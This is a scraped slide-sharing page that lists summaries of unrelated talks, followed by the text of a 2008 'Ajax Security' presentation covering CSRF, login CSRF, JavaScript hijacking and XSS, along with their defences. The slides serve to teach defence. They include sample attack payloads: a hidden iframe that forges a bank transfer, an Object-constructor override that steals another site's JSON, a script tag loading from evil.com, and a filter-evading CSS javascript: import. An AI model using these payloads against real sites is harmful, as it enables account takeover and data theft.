The document discusses various security vulnerabilities in Ajax applications including CSRF, login CSRF, JavaScript hijacking, XSS, and history stealing. It provides examples of how these attacks can be carried out and emphasizes the importance of validating and sanitizing user input to prevent scripts from being executed maliciously on a site. The document also recommends techniques for protecting against these attacks, such as using authentication tokens and disabling client-side script evaluation for untrusted sources.
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015Matt Raible
Many Spring projects exist that leverage XML for their configuration and bean definitions. Most Java web applications use a web.xml to configure their servlets, filters and listeners. This session shows you how you can eliminate XML by configuring your Spring beans with JavaConfig and annotations. It also shows how you can remove your web.xml and configure your web components with Java.
Performance optimization is a crucial aspect of building ‘snappy’ client-side applications and something which all developers using jQuery should bear in mind. In this talk, we're going to take a look at some of the best practices, tips and tricks for improving the performance of your jQuery code in 2011 with some quick wins and a few new surprises along the way.
Progressive Enhancement 2.0 (jQuery Conference SF Bay Area 2011)Nicholas Zakas
In the beginning, progressive enhancement was simple: HTML layered with CSS layered with JavaScript. That worked fine when there were two browsers, but in today's world of multiple devices and multiple browsers, it's time for a progressive enhancement reboot. At the core is the understanding that the web is not print - the same rules don't apply. As developers and consumers we've been fooled into thinking about print paradigms for too long. In this talk, you'll learn just how different the web is and how the evolution of progressive enhancement can lead to better user experiences as well as happier developers and users.
Realize mais com HTML 5 e CSS 3 - 16 EDTED - RJLeonardo Balter
Slides apresentados no 16 EDTED, edição Rio de Janeiro, em 21 de Maio de 2011.
Aqui não tem vídeos, animações e códigos apresentados, mas tem os links. Logo passo o link completo.
Slides from my talk discussing my experience rebuilding a video player I previously developed in Flash. I gave this talk on March 18th, at the Brisbane Web Design Meetup.
High Performance JavaScript (CapitolJS 2011)Nicholas Zakas
High Performance JavaScript provides techniques for optimizing JavaScript performance. It discusses how JavaScript execution blocks the browser UI thread, preventing responsive user experiences. It recommends limiting individual JavaScript jobs to under 50ms to avoid unresponsiveness. The document then provides techniques to improve load time performance such as dynamically loading scripts, and runtime techniques like timers and web workers to avoid blocking the UI thread during long-running processes.
The document discusses different approaches to using JavaScript libraries, including plug-and-play widgets, libraries that require some coding, and writing raw JavaScript from scratch. It then examines popular open-source JavaScript libraries like Prototype, jQuery, Yahoo UI, and Dojo, comparing their features, functionality, and widgets. The ideal library should have a robust core feature set along with user interface widgets, active development and support, and good documentation.
This document provides an introduction and overview of JavaScript, including data types, variables, operators, control structures, the Document Object Model (DOM), and debugging techniques. It discusses JavaScript syntax, functions, scopes, arrays, and common language features. It also covers how to include JavaScript in HTML documents, both inline and via external files. The DOM is explained as a way for JavaScript to programmatically access and modify elements in an HTML document.
The document discusses unobtrusive JavaScript and the UJS plugin for Rails. It describes separating JavaScript behavior from HTML content and CSS styling. The UJS plugin allows defining behaviors via CSS selectors and keeping scripts in external files. Examples are given of attaching remote behaviors to links and forms using the UJS plugin.
This document discusses jQuery UI and plugins. It provides an overview of jQuery UI classes that can be used to style elements. It also demonstrates several common jQuery UI widgets like buttons, accordions, dialogs, and tabs. The document discusses jQuery UI effects for animations and transitions. It provides tips for identifying good plugins based on aspects like their API, documentation, support, and community. Overall, the document is an introduction to using jQuery UI and evaluating jQuery plugins.
This is the Google Tech Talk that I gave August 17th, 2007 on building a JavaScript library. I derived much of the talk from my experiences in building the jQuery and FUEL JavaScript libraries.
This document outlines Ugo Cei's presentation "Ruby for Java Programmers". The presentation will cover how to integrate Ruby and Java code, including using bridges like JRuby, XML-RPC, and SOAP. It will also demonstrate sample code for calling Java from Ruby and vice versa. The goal is to help Java programmers learn how Ruby can be used alongside or instead of Java in certain scenarios.
This document summarizes upcoming improvements and new features in web browsers, including Firefox 3.1, Safari 4, Internet Explorer 8, Opera 10, and Google Chrome. Many of the browsers are focusing on better JavaScript performance through new engines like TraceMonkey and V8. New features include process per tab, postMessage for cross-domain communication, HTML5 drag and drop, and the Canvas element for offloading rendering to the client. Overall the browsers are aiming to improve speed, compatibility, and the user experience through these new features and technologies.
This document discusses optimizing Meetup's performance by reducing page load times. It recommends reducing JavaScript, image, DOM, and CSS files. Specific techniques include externalizing and concatenating JavaScript, lazy loading images and scripts, minimizing DOM elements, writing efficient CSS selectors, and profiling code to optimize loops and DOM manipulation. Reducing page weight through these techniques can improve the user experience by speeding up load times and drop in member activity.
This document discusses techniques for improving frontend performance. It recommends making fewer HTTP requests, using a content delivery network, adding expiration headers, gzipping components, optimizing stylesheet and script placement, avoiding redirects and duplicate scripts, and more. It also covers techniques for loading scripts asynchronously without blocking page rendering, such as using script elements, XHR, and iframes. Faster page loads can improve user experience and increase revenue.
This document discusses the transition from YUI3 to K2. It provides a brief history of YUI, describing its goals of code reuse through modular components and submodules. It highlights aspects of YUI3 that make it lighter, easier and faster to use than previous versions, including a more consistent API through the Node utility, language enhancements, dynamic loading, and combo handling for faster loading. The document suggests K2 builds upon these strengths.
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
The document discusses JavaScript MVC and templating frameworks and security issues found during penetration testing. Several frameworks were found to execute arbitrary JavaScript from markup in dangerous ways due to overuse of eval-like functions and lack of separation between code and content. This could lead to bypassing of content security policies. Metrics are proposed to evaluate frameworks on security practices like sandboxing and preventing injection into templates. While challenges exist, following best practices like strict separation of code and content could help frameworks improve security.
- The original vision of the World Wide Web was as a hyperlinked document retrieval system, not for presentation, sessions, or interactivity. If it had stayed true to this vision, modern sites like Yahoo would not exist.
- Browser wars in the 1990s led to proprietary technologies that frustrated developers. The introduction of JavaScript in 1995 allowed for dynamic and interactive web pages.
- By the 2000s, Microsoft's Internet Explorer dominated the browser market, bringing some stability through standards like DOM and DHTML. However, cross-browser differences still posed challenges for developers.
Dive deep into the internals of Android in this two-part, 150-minute class. You will explore the wonders of Dalvik bytecode, smali syntax, decompilation tools, patching techniques, and common methods you can use to (try to) protect your apps.
Extremely hands-on, you'll be downloading a very popular app, modifying it, and messing around with its behavior. Even if you're not that interested in APK hacking, you'll leave this class with the sort of deep appreciation for Dalvik that makes good Android developers great.
ProbeDroid - Crafting Your Own Dynamic Instrument Tool on Android for App Beh...ZongXian Shen
The design memo and hack note of ProbeDroid
A dynamic binary instrumentation kit targeting Android(Lollipop) 5.0 and above
This is the first complete draft.
Improved version will be updated in a few days.
Top 10 mobile security risks - Khổng Văn CườngVõ Thái Lâm
The document summarizes the top 10 mobile security risks according to the OWASP Mobile Security Project. It introduces the mobile threat model and discusses each of the top 10 risks, including weak server-side controls, insecure data storage, insufficient transport layer protection, unintentional data leakage, poor authorization and authentication, broken cryptography, client-side injection, security decisions via untrusted inputs, improper session handling, and lack of binary protections. Best practices for addressing these risks are also provided.
This document summarizes a presentation on reverse engineering obfuscated Android applications. It discusses reverse engineering techniques like static and dynamic analysis. It covers analyzing the Android application package (APK) file format and tools like apktool, smali, baksmali, and dex2jar. Common obfuscation techniques like string encryption, call hiding using reflection, and native code are also summarized. The document concludes by recommending further reading on tools and the arms race between attackers and defenders applying obfuscation.
Reverse engineering and instrumentation of android appsGaurav Lochan
The document discusses different approaches for instrumenting Android apps to add network monitoring capabilities. It describes choosing to modify the app's dex file by disassembling it to Smali code, inserting instrumentation code, and reassembling it. This allows intercepting HTTP calls without requiring access to the app's source code or build process. The key benefits are that it works on any app and Android version without the app's code needing changes.
An exploration of some of the most manicured gardens in the world. There are 36 million active gardeners in Japan, a densely populated country with little space. Gardening is an art-form in Japan but it also gives an insight into the nation's attitude to landscape and therefore provides us with an insight into Japanese landscapes in general. The geographer can derive just as much insight from these gardens as the artist can. Ask your students to watch out for roses and lawns!
This document summarizes a student's learning process for improving their English listening and speaking skills. The student's main goal was to practice speaking English. To work towards this goal, the student used online resources like English Conversational Group and English 4U to practice speaking and learn vocabulary/grammar. The student found English Conversational Group to be the most relevant and positive experience. A negative experience was limited lab hours on campus. Recommended resources included Englishbaby.com and Livemocha.com.
El documento describe las técnicas y métodos para capacitación, incluyendo presentar el tema, explicar subtemas, dominar el tema con ayuda audiovisual, hacer preguntas, implementar ejercicios de evaluación en 3 niveles, y realizar la capacitación dos veces por año.
Employee training and development can benefit both employees and employers in several ways. It can increase job satisfaction, motivation, and productivity among employees. It can also lead to increased efficiencies, financial gains, innovation, and reduced turnover for employers. Training topics include communication, computer skills, customer service, diversity, ethics, and health and safety. Training is available on personal development, managerial skills, and specific competencies and can be initiated for job training, performance improvement, professional development, or succession planning. While most training is currently voluntary, making more training mandatory may better prepare employees and the organization for the future but could face union objections.
Blue Raster Presentation for Earth Observation in the Cloud Demo DayAmazon Web Services
Nancy Harris, a research manager at the World Resources Institute, spoke about analyzing data in three dimensions. She emphasized the importance of looking at data from an environmental, social, and economic perspective to better understand complex issues. Considering multiple factors at once allows for a more holistic view that can help address sustainability challenges in a comprehensive manner.
Vector images are scalable as they are based on mathematical formulas, while bitmap images map colors to grids so they are not easily scalable and enlarging distorts lines. Vector files like EPS and AI contain shapes while bitmap files like JPG and PNG are for photos. Embedded images are stored inside documents while linked images remain outside but linked. GIF limits colors to 256 so is best for simple images, while JPEG can show complex color ranges for photos. Lossless compression like ZIP reversibly compresses files without quality loss, unlike JPEG which can lose excess data imperceptibly. PNG overcomes issues with JPEG blurring text and GIF lower quality at high resolutions.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
The document provides an introduction to web application security and the Damn Vulnerable Web Application (DVWA). It discusses common web vulnerabilities like cross-site scripting (XSS), SQL injection, and information leakage. It demonstrates how to find and exploit these vulnerabilities in DVWA, including stealing cookies, extracting database information, and creating a backdoor PHP shell. The document is intended to educate users about web security risks and show how hackers can compromise applications.
Application Security for Rich Internet Applicationss (Jfokus 2012)johnwilander
The document discusses cross-site scripting (XSS) attacks and cross-site request forgery (CSRF) attacks against rich internet applications. It begins with an overview of XSS attacks, including reflected, stored, and DOM-based XSS. It then demonstrates real examples of XSS vulnerabilities and discusses challenges of properly preventing XSS. The document next covers CSRF attacks, how they work against RESTful APIs, and techniques for mounting multi-step semi-blind CSRF attacks using invisible iframes and timed GET/POST requests in a deterministic manner.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
Is my web application exposed? We will present a short guide for the "contemporary developer" of web apps: we will survey the critical points of our web apps, the database, session stealing, cookies. We will then review the most common attacks from DOS to XSS to CSRF and ways to defend and / or limit damages.
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
The document discusses avoiding cross-site scripting (XSS) attacks. It notes that while some experts say XSS protection is easy, it can actually be challenging. It provides statistics on how common XSS errors are. It then discusses the risks of XSS attacks, including stealing data from clients or servers and exploiting browsers. It explains different types of XSS attacks and demonstrates examples. The document emphasizes the importance of input validation and output encoding to prevent XSS. It also discusses challenges like DOM-based XSS and provides recommendations for developing secure code.
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
It's time to deprecate JavaScript. It's security model and the language itself are appalling.
As data moves into the cloud the JavaScript threat is increasing and I believe the only way to fix this is to start all over again. The 14 year old language and security model aren't up to today's threats.
Rich Web App Security - Keeping your application safeJeremiah Grossman
The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.
This document summarizes security issues with JavaScript and discusses vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It provides examples of how XSS can be used to steal cookies and hijack sessions. It also discusses challenges with securing JSON responses and preventing code injection attacks. Countermeasures discussed include escaping output, adding random tokens to forms, and using a secure comment syntax to wrap sensitive JSON responses.
XSS (cross-site scripting) is a common web vulnerability that allows attackers to inject client-side scripts. The document discusses various types of XSS attacks and defenses against them. It covers:
1) Reflected/transient XSS occurs when untrusted data in URL parameters is immediately displayed without sanitization. Stored/persistent XSS occurs when untrusted data is stored and later displayed. DOM-based XSS manipulates the DOM.
2) Defenses include HTML/URL encoding untrusted data before displaying it, validating all inputs, and using context-specific encoding for HTML elements, attributes, JavaScript, and URLs.
3) The OWASP Java Encoder Project and Microsoft Anti
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
This document discusses common JavaScript security vulnerabilities like cross-site scripting (XSS), cross-site request forgery (CSRF), and clickjacking. It defines these issues and provides examples of real attacks. The document also outlines solutions for developers, including sanitizing input, escaping output, minimizing the attack surface, and designing with the assumption of breaches. Overall it stresses the importance of a holistic, multi-layered approach to JavaScript security.
The document summarizes techniques for preventing clickjacking attacks, including frame busting code, the X-Frame-Options HTTP header, and Content Security Policy. It provides examples of how to implement these techniques and their limitations. It encourages attendees to check their own websites and applications for clickjacking vulnerabilities and ways to secure them against these risks.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
The DealBook is our annual overview of the Ukrainian tech investment industry. This edition comprehensively covers the full year 2023 and the first deals of 2024.
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsMydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
INDIAN AIR FORCE FIGHTER PLANES LIST.pdfjackson110191
These fighter aircraft have uses outside of traditional combat situations. They are essential in defending India's territorial integrity, averting dangers, and delivering aid to those in need during natural calamities. Additionally, the IAF improves its interoperability and fortifies international military alliances by working together and conducting joint exercises with other air forces.
How Social Media Hackers Help You to See Your Wife's Message.pdfHackersList
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
Choose our Linux Web Hosting for a seamless and successful online presencerajancomputerfbd
Our Linux Web Hosting plans offer unbeatable performance, security, and scalability, ensuring your website runs smoothly and efficiently.
Visit- https://onliveserver.com/linux-web-hosting/
How RPA Help in the Transportation and Logistics Industry.pptxSynapseIndia
Revolutionize your transportation processes with our cutting-edge RPA software. Automate repetitive tasks, reduce costs, and enhance efficiency in the logistics sector with our advanced solutions.
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionBert Blevins
Cybersecurity is a major concern in today's connected digital world. Threats to organizations are constantly evolving and have the potential to compromise sensitive information, disrupt operations, and lead to significant financial losses. Traditional cybersecurity techniques often fall short against modern attackers. Therefore, advanced techniques for cyber security analysis and anomaly detection are essential for protecting digital assets. This blog explores these cutting-edge methods, providing a comprehensive overview of their application and importance.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
Implementations of Fused Deposition Modeling in real worldEmerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfNeo4j
Presented at Gartner Data & Analytics, London Maty 2024. BT Group has used the Neo4j Graph Database to enable impressive digital transformation programs over the last 6 years. By re-imagining their operational support systems to adopt self-serve and data lead principles they have substantially reduced the number of applications and complexity of their operations. The result has been a substantial reduction in risk and costs while improving time to value, innovation, and process automation. Join this session to hear their story, the lessons they learned along the way and how their future innovation plans include the exploration of uses of EKG + Generative AI.
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Best Programming Language for Civil EngineersAwais Yaseen
The integration of programming into civil engineering is transforming the industry. We can design complex infrastructure projects and analyse large datasets. Imagine revolutionizing the way we build our cities and infrastructure, all by the power of coding. Programming skills are no longer just a bonus—they’re a game changer in this era.
Technology is revolutionizing civil engineering by integrating advanced tools and techniques. Programming allows for the automation of repetitive tasks, enhancing the accuracy of designs, simulations, and analyses. With the advent of artificial intelligence and machine learning, engineers can now predict structural behaviors under various conditions, optimize material usage, and improve project planning.
1. Ajax Security
Keeping your application safe
Joe Walker
Copyright SitePen, Inc. 2008. All Rights Reserved
2. 89 out of 10 Websites
have serious vulnerabilities
Copyright SitePen, Inc. 2008. All Rights Reserved
3. Goal: Keep the bad guys
out of your website
Copyright SitePen, Inc. 2008. All Rights Reserved
4. The Attackers
Who is the attacker?
• Troublemakers / Thieves
Who is the victim?
• Your data / Your users / Your partners
Copyright SitePen, Inc. 2008. All Rights Reserved
5. Agenda
CSRF, Login CSRF
JavaScript Hijacking
XSS
History Stealing
Combination Attacks
Session Fixation + ADP +
Clickjacking
Copyright SitePen, Inc. 2008. All Rights Reserved
6. CSRF
(Cross Site Request Forgery)
You can still abuse someone else’s cookies
and headers even if you can’t read them
7. Recap: Cross-Domain Rules
www.bank.com www.evil.com
c = document.cookie; c = document.cookie;
alert(c); alert(c);
/* /*
Shows cookies from Shows cookies from
www.bank.com www.evil.com
*/ */
Copyright SitePen, Inc. 2008. All Rights Reserved
8. Abusing a Cookie without reading it
www.bank.com www.evil.com
Welcome to Bank.com
Welcome to Evil.com
We offer the best rates anywhere in
We’ve got lots of warez to give away
the world, guaranteed. Give us your
for freee. Download our stuffs and
money and we will look after it in
then come back and get more
the same way we look after little
stuffs. Videoz, Warez, Codez, Mp3s
baby kittens.
.
<iframe width=0 height=0
src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/>
Copyright SitePen, Inc. 2008. All Rights Reserved
9. CSRF
JavaScript is not always required to exploit a CSRF hole
Often all you need is:
• <iframe src=quot;dangerous_urlquot;>
• or <img src=quot;dangerous_urlquot;/>
• or <script src=quot;dangerous_urlquot;>
You can’t use XHR because cross-domain rules prevent
the request from being sent
Copyright SitePen, Inc. 2008. All Rights Reserved
10. CSRF
CSRF attacks are write-only (with one exception)
Both GET and POST can be forged
Referrer checking is not a complete fix
It’s not just cookies that get stolen:
• HTTP-Auth headers
• Active Directory Kerberos tokens
Copyright SitePen, Inc. 2008. All Rights Reserved
11. CSRF - Protection
Not 100%
solution
Force users to log off
Check referrer headers (https only)
Include authentication tokens
The only
complete
in the body of EVERY request
solution
Copyright SitePen, Inc. 2008. All Rights Reserved
12. CSRF - Protection
Security tokens in GET requests are not a great idea
(bookmarks, caches, GET is idempotent etc)
POST means forms with hidden fields
• OWASP servlet filter
http://www.owasp.org/index.php/CSRF_Guard
Double-submit cookie pattern (Ajax requests only)
• Read the cookie with Javascript and submit in the
body
Copyright SitePen, Inc. 2008. All Rights Reserved
14. Login CSRF
If I can make your browser do things behind your back,
how about logging you out of some service and back in
as me.
What are the possibilities when you think that you are
you, but you’re not; you’re me?
Copyright SitePen, Inc. 2008. All Rights Reserved
15. Login CSRF - Attacks
What can I do?
• See what you search for
• See what books you want to buy
• Read emails that you send
• Steal credit card details through PayPal
• etc
Copyright SitePen, Inc. 2008. All Rights Reserved
16. Login CSRF - Defense
If submitting over https: use Referrer checking
• Do not assume no referrer is safe
Use authentication tokens in your login form
Watch out for session fixation attacks
• Invalidate the server session on login and re-create it
Copyright SitePen, Inc. 2008. All Rights Reserved
17. JavaScript
Hijacking
(or how your GMail
contacts were at risk)
Sucking data out of Objects before
they’re created
18. JavaScript Hijacking
“CSRF is write-only with one known exception”
Using <script> automatically evaluates the returned
script
So if you can just find a way to intercept scripts as they
are evaluated ...
Copyright SitePen, Inc. 2008. All Rights Reserved
19. <script type=quot;text/javascriptquot;>
function Object() {
alert(quot;Hello, Worldquot;);
}
var x = {};
</script>
Copyright SitePen, Inc. 2008. All Rights Reserved
20. <script type=quot;text/javascriptquot;>
function Object() {
this.__defineSetter__('wibble', function(x) {
alert(x);
});
}
var x = {};
x.wibble = quot;Hello, Worldquot;;
</script>
Copyright SitePen, Inc. 2008. All Rights Reserved
21. <script type=quot;text/javascriptquot;>
var obj;
function Object() {
obj = this;
this.__defineSetter__('killme', function(x) {
for (key in obj) {
if (key != 'killme') {
alert('Stolen: ' + key + '=' + obj[key]);
}
}
});
setTimeout(quot;obj['killme']='ignored';quot;, 0);
}
</script>
<script src=quot;http://example.com/data-service/quot;>
Copyright SitePen, Inc. 2008. All Rights Reserved
22. JavaScript Hijacking
When you serve JavaScript from a website it
could be evaluated in a hostile environment
Protect secrets in JavaScript in the same way
that you would protect them elsewhere
Copyright SitePen, Inc. 2008. All Rights Reserved
23. JavaScript Hijacking
Sometimes people wish to have a double layer of
security to prevent evaluation:
/*<JSON_HERE>*/ (Don’t do this)
while(true); <JSON_HERE> (Google)
throw new Error(quot;quot;); <JSON_HERE> (DWR)
{}&& <JSON_HERE>
Copyright SitePen, Inc. 2008. All Rights Reserved
24. XSS (Cross Site Scripting)
Abusing someone’s trust in your typing
26. XSS
2 types:
• Reflected: Script embedded in the request is
‘reflected’ in the response
• Stored: Attacker’s input is stored and played back in
later page views
Copyright SitePen, Inc. 2008. All Rights Reserved
27. XSS
Scenario: You let the user enter their name
Someone is going to enter their name like this:
Joe<script src=quot;http://evil.com/danger.jsquot;>
Then, whoever looks at Joe’s name will execute Joe’s
script and become a slave of Joe
Generally HTML is not a valid input, but sometimes it is:
• Blogs, MySpace, Wikis, RSS readers, etc
Copyright SitePen, Inc. 2008. All Rights Reserved
28. XSS - Making User Input Safe
So, you filter out ‘<script.*>’ and then you’re safe.
Right?
Copyright SitePen, Inc. 2008. All Rights Reserved
30. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href=quot;a.htmlquot; link</a>
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
31. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href=quot;a.htmlquot;>link
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
32. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href=quot;a.html >link</a>
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
33. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This: (depending on some encoding tricks)
¼a href=quot;a.htmlquot;¾link¼/a¾
makes perfect sense to a browser.
Copyright SitePen, Inc. 2008. All Rights Reserved
34. XSS - Making User Input Safe
And we haven’t got into:
• Flash (ActionScript ~= JavaScript)
• SVG (can embed JavaScript)
• XML Data Islands (IE only)
• HTML+TIME
You can use both <object> and <embed> for many of
these
Copyright SitePen, Inc. 2008. All Rights Reserved
35. XSS - The Heart of the Problem
“Be conservative in what you do; be
liberal in what you accept from others”
Postel’s Law
Copyright SitePen, Inc. 2008. All Rights Reserved
36. XSS - The Heart of the Problem
In + A Out
B
Copyright SitePen, Inc. 2008. All Rights Reserved
37. The web developers get lazy ...
Copyright SitePen, Inc. 2008. All Rights Reserved
38. The browser fixes the problems ...
Copyright SitePen, Inc. 2008. All Rights Reserved
39. The users like
the new
browser ...
Copyright SitePen, Inc. 2008. All Rights Reserved
41. The browser fixes the problems ...
Copyright SitePen, Inc. 2008. All Rights Reserved
42. The users like the
new browser even
more ...
Copyright SitePen, Inc. 2008. All Rights Reserved
43. XSS - The Heart of the Problem
¼STYLE¾@import'javas
cri
pt:danger()';¼/STYLE¾
Copyright SitePen, Inc. 2008. All Rights Reserved
44. XSS - Protection (HTML is Illegal)
1. Filter inputs by white-listing input characters
• Remember to filter header names and values
2. Filter outputs for the destination environment
For HTML:
< < > > ' ' quot; " & &
For JavaScript Strings (but see later):
' ' quot; quot; LF n CR r * uXXXX
Other environments have other special chars
Copyright SitePen, Inc. 2008. All Rights Reserved
45. XSS - Protection (well-formed HTML is legal)
1. Filter inputs as before
2. Validate as HTML and throw away if it fails
3. Swap characters for entities (as before)
